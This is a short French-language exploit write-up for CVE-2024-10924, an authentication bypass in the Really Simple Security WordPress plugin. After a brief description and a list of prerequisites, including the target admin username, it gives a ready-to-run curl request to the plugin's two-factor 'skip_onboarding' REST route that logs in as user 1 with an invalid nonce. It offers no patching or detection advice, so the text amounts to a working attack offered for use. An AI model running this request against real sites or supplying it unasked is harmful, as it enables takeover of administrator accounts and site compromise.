
CVE-2024-10924 est une vulnérabilité critique de contournement de l'authentification dans le plugin Really Simple Security pour WordPress (versions 9.0.0 à 9.1.1.1). Cette vulnérabilité permet à des attaquants non authentifiés de se connecter en tant que n'importe quel utilisateur (y compris l'administrateur) en exploitant une faille dans l'API d'authentification à deux facteurs (2FA).
Un site WordPress exécutant une version vulnérable du plugin Really Simple Security. Python 3.x ou cURL installé pour les tests. Le nom d'utilisateur administrateur WordPress cible (l'énumération des utilisateurs peut être nécessaire).
curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v